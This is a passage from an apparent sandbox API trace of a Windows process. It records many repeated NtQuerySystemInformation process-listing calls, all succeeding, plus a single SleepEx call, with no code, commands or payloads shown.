ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f08) returned 0x0 [0183.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x13f48) returned 0x0 [0183.547] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0186.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0x14008) returned 0x0 [0186.326] 